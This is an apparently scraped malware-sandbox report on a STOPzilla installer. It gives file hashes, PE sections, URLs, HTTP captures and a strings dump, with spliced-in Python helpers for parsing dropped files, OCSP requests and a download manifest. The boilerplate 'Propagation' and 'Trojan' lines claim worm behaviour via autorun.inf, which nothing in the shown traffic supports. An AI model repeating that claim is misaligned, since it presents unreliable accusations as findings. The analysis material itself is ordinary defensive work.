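b97ad2bcd333f82776d7ff1ead919ce2 | c:\Program Files (x86)\STOPzilla\x64\sbbd.exe |
b97ad2bcd333f82776d7ff1ead919ce2 | c:\Windows\SysWOW64\sbbd.exe |
b97ad2bcd333f82776d7ff1ead919ce2 | c:\Windows\System32\sbbd.exe |
df9a5545501a2442ca54c73c6f4de827 | c:\Windows\SysWOW64\mfc120.dll |
df9a5545501a2442ca54c73c6f4de827 | c:\Windows\System32\mfc120.dll |
'''

ROW_RE = re.compile(r'^\s*([0-9a-fA-F]{32})\s*\|\s*(.+?)\s*\|\s*$')
SYSTEM32_RE = re.compile(r'^(.*\\windows\\)system32\\([^\\]+)$', re.IGNORECASE)

def parse_dropped_table(text):
    """Return [(md5, path)] for every data row; the header and '---|---|' rows do not match."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append((m.group(1).lower(), m.group(2)))
    return rows

def group_by_hash(rows):
    groups = defaultdict(list)
    for md5, path in rows:
        groups[md5].append(path)
    return dict(groups)

def wow64_redirect_pairs(groups):
    """(md5, System32 path, SysWOW64 path) where one hash sits under both names.
    A 32-bit installer writing to the System32 directory on x64 is redirected to
    SysWOW64, so the sandbox records one write under two paths; these are not two files."""
    pairs = []
    for md5, paths in groups.items():
        by_lower = {p.lower(): p for p in paths}
        for p in paths:
            m = SYSTEM32_RE.match(p)
            if m:
                twin = (m.group(1) + 'syswow64\\' + m.group(2)).lower()
                if twin in by_lower:
                    pairs.append((md5, p, by_lower[twin]))
    return pairs

def kernel_drivers(rows):
    """Paths ending in .sys: kernel code, worth checking signatures on before anything else."""
    return sorted(path for _, path in rows if path.lower().endswith('.sys'))

def unique_hashes(rows):
    return sorted({md5 for md5, _ in rows})

if __name__ == '__main__':
    rows = parse_dropped_table(SAMPLE_ROWS)
    print(len(rows), 'rows,', len(unique_hashes(rows)), 'distinct hashes')
    for pair in wow64_redirect_pairs(group_by_hash(rows)):
        print('WOW64 twin:', pair)
    print('drivers:', kernel_drivers(rows))
```

Fed the full table, the distinct-hash list is what goes to a reputation service, and every System32 entry that has a SysWOW64 twin with the same hash can be dropped from the "files written" count.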
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
VersionInfo
Company Name: iS3, Inc.
Product Name: STOPzilla
Product Version: 1.0.0.1
Legal Copyright: Copyright (C) 2015
Legal Trademarks:
Original Filename: SZSetup.exe
Internal Name: SZSetup.exe
File Version: 1.0.0.1
File Description: SZSetup
Comments:
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 444320 | 444416 | 4.63553 | 01fe5975a96463c68a9730b939f9c82e |
.rdata | 450560 | 128084 | 128512 | 2.99724 | 3ed91c6d79cd15da81a5129faeb566cd |
.data | 581632 | 26316 | 12800 | 3.20506 | 18ad26b6e346363516b81415c2eedf3e |
.rsrc | 610304 | 1419844 | 1420288 | 5.24637 | 7e184cea4470ac1a14b855d48139c2d0 |
.reloc | 2031616 | 27584 | 27648 | 4.54562 | d2edca433123a76dca5a79625fbfa3ae |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
URL |
---|
hxxp://gdcrl.godaddy.com.akadns.net/repository/gdig2.crt |
hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab?19442460aa19440e |
hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt?a208639af14885de |
hxxp://download.stopzilla.com/binaries/stopzilla/auto_installer/7.0.1.3/manifest.xml |
hxxp://d3ac8f3lk2h244.cloudfront.net/binaries/stopzilla/auto_installer/7.0.1.3/STOPzilla7.msi |
hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?654c6292470e300a |
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c= |
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEDNHuJ72IX1vtHJpLeSTGzQ= |
hxxp://a1621.g.akamai.net/pki/crl/products/microsoftrootcert.crl |
hxxp://a1621.g.akamai.net/pki/crl/products/WinPCA.crl |
hxxp://a1621.g.akamai.net/pki/crl/products/MicrosoftTimeStampPCA.crl |
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c= |
hxxp://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl |
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?19442460aa19440e |
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt?a208639af14885de |
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?654c6292470e300a |
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEDNHuJ72IX1vtHJpLeSTGzQ= |
hxxp://downloads.stopzilla.com/binaries/stopzilla/auto_installer/7.0.1.3/STOPzilla7.msi |
hxxp://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl |
hxxp://crl.microsoft.com/pki/crl/products/WinPCA.crl |
hxxp://certificates.godaddy.com/repository/gdig2.crt |
home.is3.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
SURICATA UDPv4 invalid checksum
SURICATA IPv4 invalid checksum
Both alerts are Suricata decoder events, not Emerging Threats signature matches. On traffic captured on the sending host they are normally produced by checksum offloading to the NIC and carry no verdict about the content of the traffic.
Traffic
GET /binaries/stopzilla/auto_installer/7.0.1.3/STOPzilla7.msi HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain
User-Agent: SZHttp/1.0
Host: downloads.stopzilla.com
HTTP/1.1 200 OK
Content-Type: binary/octet-stream
Content-Length: 23516160
Connection: keep-alive
Date: Tue, 07 Apr 2015 16:59:38 GMT
Cache-Control: max-age=3600
Last-Modified: Tue, 07 Apr 2015 15:38:43 GMT
ETag: "0c997fa32c992c652ebd769fca552fbf"
Accept-Ranges: bytes
Server: AmazonS3
Age: 3589
X-Cache: Hit from cloudfront
Via: 1.1 e506c7e675965afaac0dc7f9ab49be60.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fOmEzwFxgAUsh_fboTv_87DqGKtSCZw6OezYV8jQcPTzGFb6Xv4tRg==
<<< skipped: binary response body (the MSI itself, an OLE compound file; the "Root Entry" and "SummaryInformation" stream names were legible in the dump) >>>
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?19442460aa19440e HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Feb 2015 00:37:01 GMT
If-None-Match: "80b4d90ca4fd01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com
HTTP/1.1 304 Not Modified
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Feb 2015 00:37:01 GMT
ETag: "80b4d90ca4fd01:0"
Cache-Control: max-age=604800
Date: Sat, 25 Apr 2015 01:15:56 GMT
Connection: keep-alive
GET /msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt?a208639af14885de HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com
HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT
Accept-Ranges: bytes
ETag: "05934e1494dd01:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
Content-Length: 969
Date: Sat, 25 Apr 2015 01:15:57 GMT
Connection: keep-alive
(DER certificate body, 969 bytes: Go Daddy Root Certificate Authority - G2, C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., issuer identical to subject, valid 090901000000Z to 371231235959Z) <<< skipped >>>
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1762
content-transfer-encoding: binary
Cache-Control: max-age=581366, public, no-transform, must-revalidate
Last-Modified: Fri, 24 Apr 2015 18:45:16 GMT
Expires: Fri, 1 May 2015 18:45:16 GMT
Date: Sat, 25 Apr 2015 01:16:04 GMT
Connection: keep-alive
(DER OCSP response, 1762 bytes: producedAt 20150424184516Z, thisUpdate 20150424184516Z, nextUpdate 20150501184516Z; signed by "Symantec Class 3 PCA - G5 OCSP Responder Certificate 3", issued by VeriSign Class 3 Public Primary Certification Authority - G5, valid 141202000000Z to 151216235959Z, CPS hXXp://VVV.symauth.com/cps) <<< skipped >>>
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEDNHuJ72IX1vtHJpLeSTGzQ= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1725
content-transfer-encoding: binary
Cache-Control: max-age=578942, public, no-transform, must-revalidate
Last-Modified: Fri, 24 Apr 2015 18:05:06 GMT
Expires: Fri, 1 May 2015 18:05:06 GMT
Date: Sat, 25 Apr 2015 01:16:04 GMT
Connection: keep-alive
(DER OCSP response, 1725 bytes: producedAt 20150424180506Z, thisUpdate 20150424180506Z, nextUpdate 20150501180506Z; signed by "VeriSign Class 3 Code Signing 2010 OCSP Responder", issued by VeriSign Class 3 Code Signing 2010 CA, valid 150225000000Z to 150526235959Z, CPS hXXps://VVV.verisign.com/CPS) <<< skipped >>>
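The requests in this capture that carry User-Agent Microsoft-CryptoAPI/6.1 (the trust-list cabinets and root certificate from ctldl.windowsupdate.com, the two OCSP queries to ocsp.verisign.com, the GoDaddy intermediate from certificates.godaddy.com and the CRLs from crl.microsoft.com) are issued by the Windows certificate-chain engine while it builds and checks chains, not by the sample's own HTTP client, which identifies itself as SZHttp/1.0. The Code Signing 2010 responder and the MicrosoftTimeStampPCA CRL point to Authenticode verification of signed binaries. This is background revocation traffic and should not be listed as an indicator for the sample. The path of an OCSP GET is a base64-encoded DER OCSPRequest (RFC 6960, Appendix A.1), so the CertID it carries can be recovered offline. The following is an added example, not code from this page or from the vendor: a minimal DER walker that decodes the two request paths copied from the GET lines above. It assumes the request has no requestorName and skips any context-tagged version field; the hash OID table covers only SHA-1 and SHA-256. The two responses on the page come from the VeriSign Class 3 PCA - G5 responder and the VeriSign Class 3 Code Signing 2010 responder, which is the pattern expected when one request covers a code-signing intermediate and the other its leaf; comparing the decoded issuerKeyHash values with the authorityKeyIdentifier of the certificates in a signed file is how an analyst confirms which chain a given OCSP query belongs to.

```python
"""Decode the CertID inside OCSP GET request paths (added example, stdlib only)."""
import base64
from urllib.parse import unquote

# Hash algorithm OIDs the decoder labels; anything else is returned as dotted OID.
HASH_OIDS = {"1.3.14.3.2.26": "sha1", "2.16.840.1.101.3.4.2.1": "sha256"}

# Paths copied from the two "GET /MFEw..." lines to ocsp.verisign.com on the page.
REQUEST_PATHS = [
    "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c=",
    "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEDNHuJ72IX1vtHJpLeSTGzQ=",
]


def read_tlv(buf, pos):
    """Read one DER tag-length-value at buf[pos]; return (tag, value, end offset)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long-form length: next n bytes hold it
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    end = pos + length
    if end > len(buf):
        raise ValueError("DER length runs past end of buffer")
    return tag, buf[pos:end], end


def children(value):
    """Split a constructed DER value into its list of (tag, value) children."""
    out, pos = [], 0
    while pos < len(value):
        tag, val, pos = read_tlv(value, pos)
        out.append((tag, val))
    return out


def decode_oid(raw):
    """Turn DER OBJECT IDENTIFIER content bytes into dotted notation."""
    arcs = [raw[0] // 40, raw[0] % 40]
    acc = 0
    for b in raw[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:                   # last byte of this base-128 arc
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))


def parse_ocsp_get(path):
    """Return one dict per CertID in an OCSP GET request path.

    OCSPRequest ::= SEQUENCE { tbsRequest TBSRequest, optionalSignature [0] ... }
    TBSRequest  ::= SEQUENCE { version [0] ..., requestorName [1] ..., requestList SEQUENCE OF Request }
    Request     ::= SEQUENCE { reqCert CertID, singleRequestExtensions [0] ... }
    CertID      ::= SEQUENCE { hashAlgorithm, issuerNameHash OCTET STRING,
                               issuerKeyHash OCTET STRING, serialNumber INTEGER }
    """
    der = base64.b64decode(unquote(path.lstrip("/")))
    tag, ocsp_request, end = read_tlv(der, 0)
    if tag != 0x30 or end != len(der):
        raise ValueError("path does not decode to a single DER SEQUENCE")
    tbs_request = children(ocsp_request)[0][1]
    # requestList is the first universal SEQUENCE; [0]/[1] context tags are skipped.
    request_list = next(v for t, v in children(tbs_request) if t == 0x30)
    results = []
    for _, request in children(request_list):
        cert_id = children(request)[0][1]
        alg, name_hash, key_hash, serial = children(cert_id)[:4]
        oid = decode_oid(children(alg[1])[0][1])        # AlgorithmIdentifier.algorithm
        results.append({
            "hash_alg": HASH_OIDS.get(oid, oid),
            "issuer_name_hash": name_hash[1].hex(),
            "issuer_key_hash": key_hash[1].hex(),
            # DER INTEGER may carry a 0x00 pad byte for a positive high-bit value
            "serial": (serial[1].lstrip(b"\x00") or b"\x00").hex(),
        })
    return results


if __name__ == "__main__":
    for p in REQUEST_PATHS:
        for cert_id in parse_ocsp_get(p):
            print(cert_id)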
GET /repository/gdig2.crt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: certificates.godaddy.com
HTTP/1.1 200 OK
Date: Sat, 25 Apr 2015 01:15:56 GMT
Server: Apache
Last-Modified: Wed, 21 Jan 2015 00:41:10 GMT
ETag: "6c0-50d1ecfcc3580"
Accept-Ranges: bytes
Content-Length: 1728
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Connection: close
Content-Type: application/x-x509-ca-cert
(PEM certificate body, 1728 bytes: Go Daddy Secure Certificate Authority - G2, issued by Go Daddy Root Certificate Authority - G2, valid 110503070000Z to 310503070000Z) <<< skipped >>>
GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1
Cache-Control: max-age = 900
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Mar 2015 05:02:25 GMT
If-None-Match: "a1132b8ef65d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
HTTP/1.1 304 Not Modified
Content-Type: application/pkix-crl
Last-Modified: Tue, 24 Mar 2015 05:02:25 GMT
ETag: "a1132b8ef65d01:0"
Cache-Control: max-age=900
Date: Sat, 25 Apr 2015 01:16:35 GMT
Connection: keep-alive
GET /pki/crl/products/WinPCA.crl HTTP/1.1
Cache-Control: max-age = 900
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sat, 07 Mar 2015 06:01:44 GMT
If-None-Match: "dde36a309c58d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
HTTP/1.1 304 Not Modified
Content-Type: application/pkix-crl
Last-Modified: Sat, 07 Mar 2015 06:01:44 GMT
ETag: "dde36a309c58d01:0"
Cache-Control: max-age=900
Date: Sat, 25 Apr 2015 01:16:35 GMT
Connection: keep-alive
GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1
Cache-Control: max-age = 900
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 05 Mar 2015 06:01:35 GMT
If-None-Match: "cf2633d6957d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
HTTP/1.1 304 Not Modified
Content-Type: application/pkix-crl
Last-Modified: Thu, 05 Mar 2015 06:01:35 GMT
ETag: "cf2633d6957d01:0"
Cache-Control: max-age=900
Date: Sat, 25 Apr 2015 01:16:35 GMT
Connection: keep-alive
GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?654c6292470e300a HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Mar 2015 16:17:41 GMT
If-None-Match: "804047d4e66d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com
HTTP/1.1 304 Not Modified
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Mar 2015 16:17:41 GMT
ETag: "804047d4e66d01:0"
Cache-Control: max-age=86400
Date: Sat, 25 Apr 2015 01:16:04 GMT
Connection: keep-alive
GET /binaries/stopzilla/auto_installer/7.0.1.3/manifest.xml HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain
User-Agent: SZHttp/1.0
Host: download.stopzilla.com
HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 2063
Content-Type: text/xml
Last-Modified: Tue, 07 Apr 2015 15:38:09 GMT
Accept-Ranges: bytes
ETag: "b7aa46d94871d01:6ec1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 25 Apr 2015 01:15:57 GMT
<?xml version="1.0" encoding="utf-8" ?>
<szmanifest schema="1" version="7.0.1.3">
  <file name="STOPzilla7.msi" location="hXXp://downloads.stopzilla.com/binaries/stopzilla/auto_installer/7.0.1.3/STOPzilla7.msi" size="23516160" original_size="23516160" sha256="e179bb743303e628c1e1f85c5ad4bf12a36e985d5e707b28ce83a78feac9d0e1" msi_version="7.0.1.3" min_version="7.0.1.3" incremental="0" />
  <file name="SZServer.exe" location="hXXp://downloads.stopzilla.com/binaries/stopzilla/auto_installer/7.0.1.3/SZServer.bin" size="709858" original_size="709858" sha256="226f560ff43434b0bdf1940d86bf9ce2dc8220545ae6357275316446e1a6a7a6" encoding="zfzip" incremental="1" />
  <file name="STOPzilla.exe" location="hXXp://downloads.stopzilla.com/binaries/stopzilla/auto_installer/7.0.1.3/STOPzilla.bin" size="924330" original_size="924330" sha256="eb2282a8edce7c27ef8cd285fd2c702e2936d4f7a9ededea8d5536db94f76314" encoding="zfzip" incremental="1" />
  <file name="SZNetAssistant.exe" location="hXXp://downloads.stopzilla.com/binaries/stopzilla/auto_installer/7.0.1.3/SZNetAssistant.bin" size="1318507" original_size="1318507" sha256="3f49e7e37932dd83bb51e99230dff23f45a2fb5de21390b63c976501fb15cd76" encoding="zfzip" incremental="1" />
  <file name="SZFileAssistant.exe" location="hXXp://downloads.stopzilla.com/binaries/stopzilla/auto_installer/7.0.1.3/SZFileAssistant.bin" size="465312" original_size="465312" sha256="1ee3f0af8e312d63bc65a518a1e94a718498dca56ab589a6353584207922e14d" encoding="zfzip" increment<<< skipped >>>
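The manifest above drives the staged install: SZHttp/1.0 fetches manifest.xml from download.stopzilla.com over plain HTTP, then each listed component from downloads.stopzilla.com; the 23516160-byte Content-Length of the STOPzilla7.msi response matches the manifest's size attribute, and every entry reports size equal to original_size. The following added example, not the vendor's code, parses the four complete entries and checks downloaded bytes against the manifest's size and sha256. The manifest text is copied as printed, with the page's hXXp defanging kept, and the blob used in the check is a constructed stand-in rather than the real installer. The manifest does not say whether sha256 covers the zfzip-compressed .bin or the decompressed original; the example assumes the bytes exactly as served. A caveat for anyone adopting this pattern: hashes delivered over the same unauthenticated channel as the files detect corruption and a single substituted file, but not an on-path attacker who rewrites manifest and files together; trust is anchored only by a signature check such as the Authenticode verification that the Microsoft-CryptoAPI traffic in this capture belongs to.

```python
"""Parse an szmanifest and verify downloaded bytes against it (added example)."""
import hashlib
import xml.etree.ElementTree as ET

# The four complete <file> entries from manifest.xml as printed on the page.
# The fifth entry is cut off on the page and is left out here.
MANIFEST_XML = """<?xml version="1.0" encoding="utf-8" ?>
<szmanifest schema="1" version="7.0.1.3">
  <file name="STOPzilla7.msi" location="hXXp://downloads.stopzilla.com/binaries/stopzilla/auto_installer/7.0.1.3/STOPzilla7.msi" size="23516160" original_size="23516160" sha256="e179bb743303e628c1e1f85c5ad4bf12a36e985d5e707b28ce83a78feac9d0e1" msi_version="7.0.1.3" min_version="7.0.1.3" incremental="0" />
  <file name="SZServer.exe" location="hXXp://downloads.stopzilla.com/binaries/stopzilla/auto_installer/7.0.1.3/SZServer.bin" size="709858" original_size="709858" sha256="226f560ff43434b0bdf1940d86bf9ce2dc8220545ae6357275316446e1a6a7a6" encoding="zfzip" incremental="1" />
  <file name="STOPzilla.exe" location="hXXp://downloads.stopzilla.com/binaries/stopzilla/auto_installer/7.0.1.3/STOPzilla.bin" size="924330" original_size="924330" sha256="eb2282a8edce7c27ef8cd285fd2c702e2936d4f7a9ededea8d5536db94f76314" encoding="zfzip" incremental="1" />
  <file name="SZNetAssistant.exe" location="hXXp://downloads.stopzilla.com/binaries/stopzilla/auto_installer/7.0.1.3/SZNetAssistant.bin" size="1318507" original_size="1318507" sha256="3f49e7e37932dd83bb51e99230dff23f45a2fb5de21390b63c976501fb15cd76" encoding="zfzip" incremental="1" />
</szmanifest>
"""


def parse_manifest(xml_text):
    """Return the <file> entries of an szmanifest as dicts with typed fields."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    if root.tag != "szmanifest":
        raise ValueError("unexpected root element %r" % root.tag)
    entries = []
    for f in root.findall("file"):
        size = int(f.get("size"))
        entries.append({
            "name": f.get("name"),
            "location": f.get("location"),
            "size": size,
            "original_size": int(f.get("original_size", size)),
            "sha256": (f.get("sha256") or "").lower(),
            "encoding": f.get("encoding"),            # "zfzip" marks a compressed .bin
            "incremental": f.get("incremental") == "1",
        })
    return entries


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def verify_download(entry, data):
    """Check downloaded bytes against one manifest entry.

    Returns a list of problems; an empty list means size and sha256 both match.
    Assumption: the manifest's sha256 covers the bytes exactly as served at `location`.
    """
    problems = []
    if len(data) != entry["size"]:
        problems.append("size %d != manifest %d" % (len(data), entry["size"]))
    digest = entry["sha256"]
    if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
        problems.append("manifest sha256 malformed")
    elif sha256_hex(data) != digest:
        problems.append("sha256 mismatch")
    return problems


def verify_all(entries, downloads):
    """Map entry name -> problems for every entry; a missing download is itself a problem."""
    report = {}
    for e in entries:
        data = downloads.get(e["name"])
        report[e["name"]] = ["not downloaded"] if data is None else verify_download(e, data)
    return report


if __name__ == "__main__":
    entries = parse_manifest(MANIFEST_XML)
    stand_in = b"constructed stand-in bytes, not the real STOPzilla7.msi"
    for name, problems in verify_all(entries, {"STOPzilla7.msi": stand_in}).items():
        print(name, "OK" if not problems else "; ".join(problems))
```

Run against a real download directory the same way: read each file named in the manifest into the `downloads` dict and reject the install if any entry's problem list is non-empty.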
The Trojan connects to the servers at the following location(s):
.text
`.rdata
@.data
.rsrc
@.reloc
vipre.targets.
SQLite format 3
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYWITHOUTERELEASEATTACHAVINGROUPDATEBEGINNERECURSIVEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTRIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
CREATE TABLE sqlite_master(
sql text
3.8.8.3
CREATE TEMP TABLE sqlite_temp_master(
zilla.applications.stopzilla.license.volume_serial
zilla.applications.stopzilla.license.instance_key
zilla.applications.stopzilla.license.type
home-service.phone-home.status
scan.results_xml
CSZScanStoredAction::Execute
custom.all-drives
custom.known-file-types
custom.ignore-removable
custom.cookies
custom.processes
custom.deep-processes
custom.registry
custom.all-users
custom.derivatives
custom.root-kits
custom.archives
custom.common-tactics
custom.path.
vipre.targets.out_of_date
vipre.ap.
vipre.ap.unspecified
external.url_survey
system.first_run
system.install.realtime_reboot_required
system.last.service.shutdown.time
system.last_boot_time
system.initial_ap_handled
CSZSQLDatabase::ExecuteSQL
CSZSQLDatabase::CompileSQL
</%s>
<!--%s-->
<?%s?>
<!%s>
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
os_win.c:%d: (%lu) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s%c%s
recovered %d pages from %s
recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
FOREIGN KEY constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
FOREIGN KEY
abort at %d in [%s]: %s
%s constraint failed: %s
%s constraint failed
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open table without rowid: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
%s prohibited in partial index WHERE clauses
%s prohibited in CHECK constraints
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
hex literal too big: %s
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
sqlite_stat3
sqlite_stat4
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
%s cannot use variables
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
